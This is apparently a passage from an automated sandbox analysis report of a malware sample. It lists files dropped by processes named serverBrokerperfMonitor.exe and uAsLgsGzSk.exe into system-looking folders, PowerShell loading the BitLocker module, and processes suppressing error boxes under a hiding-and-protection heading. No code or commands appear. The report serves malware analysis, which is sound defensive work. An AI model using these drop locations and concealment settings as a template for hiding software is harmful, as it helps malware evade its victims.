                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\htcPaTVC.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Recovery\SystemSettings.exeJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\vJjMMWBx.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\QdcRcxPi.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\NVLRgsWM.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\vPOensqX.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\cIDyHnkk.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Windows\ShellExperiences\uAsLgsGzSk.exeJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Windows\ShellExperiences\uAsLgsGzSk.exeJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\NVLRgsWM.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\vJjMMWBx.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\maPwcuvP.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\HupKRiKa.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\cIDyHnkk.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\JwbtnRPV.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zIxCDFUn.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\zHJVyCcw.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\IitSDvGY.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\hnxxzxgb.logJump to dropped file
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeFile created: C:\Users\user\Desktop\qeoNTMEG.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\CvvLBlqK.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\htcPaTVC.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\FyhuXVvF.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\vPOensqX.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\mlFoDzaq.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\eIxzTFKJ.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\LqKTzAAu.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\qTMMgMAe.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\QdcRcxPi.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\GvICsVKA.logJump to dropped file
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile created: C:\Users\user\Desktop\xRAMIbuT.logJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
